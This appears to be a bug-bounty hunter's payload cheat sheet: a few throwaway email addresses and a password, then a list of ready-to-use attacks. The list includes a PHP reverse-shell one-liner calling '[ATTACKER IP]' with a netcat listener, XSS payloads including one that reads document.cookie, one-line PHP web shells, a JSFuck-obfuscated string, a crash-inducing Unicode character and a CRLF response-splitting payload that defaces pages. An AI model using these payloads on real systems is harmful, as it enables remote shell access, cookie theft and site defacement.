knapsack@bugcrowdninja.com
johndoe@guerrillamail.biz
JohnDoe@123

(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]] +([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++ [[]][+[]]]+([!![]]+[])[+[]] 

http://www.digital-india.byethost7.com/alert.html

Run on taget shell: php -r ‘$sock=fsockopen(“[ATTACKER IP]”,5555);exec(“/bin/sh -i <&3 >&3 2>&3”);’ 
Run on attacker shell: nc -lvp 5555

<script>alert(1)</script>

<img src='test' onmouseover='alert(2)'>

"><img src=x onerror=prompt(document.cookie)>

<?=$_GET[0]($_POST[1]);?>

<?php passthru(\$_GET'cmd'; _halt_compiler(); ?>

జ్ఞా

%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>deface</html>
